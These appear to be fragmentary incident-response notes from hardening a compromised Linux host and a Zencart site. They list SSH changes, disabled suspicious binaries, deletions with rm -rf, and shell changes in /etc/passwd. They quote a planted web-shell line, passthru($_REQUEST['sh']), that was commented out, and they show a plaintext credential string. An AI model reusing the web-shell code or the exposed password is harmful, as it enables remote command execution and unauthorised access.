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/etc/ssh/sshd_config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PasswordAuthentication no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Commented out Subsystem sftp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Commented out AuthorizedKeysFile /etc/ssh/ssh_host_ed256_key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everyone’s key to /root/.ssh/authorized_keys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Suspicious processes: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000 /usr/bin/morepipe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000 /sbin/fsdisk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Suspicious binaries and dirs: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unlink /bin/false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000 /usr/share/bash-completion/helpers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-rf /var/backups/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000 /bin/fsck.ext4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/usr/local/sbin/run-parts /var/www/bad/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-rf /usr/sbin/dpkg-update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/etc/passwd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bin:x:2:2:bin:/bin:/bin/sh to bin:x:2:2:bin:/bin:/bin/nologin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all /bin/false to /usr/sbin/nologin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Zencart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Admin login https://10.101.101.77/manage/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command in /var/www/zencart/ajax.php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 Commented out passthru($_REQUEST['sh']);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/var/www/zencart/extras/wgettester.php /var/www/bad/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cred changed using mysql command.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 OkwVAEKH1hrAA13tuRck1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Zencart upgraded to 1.5.6c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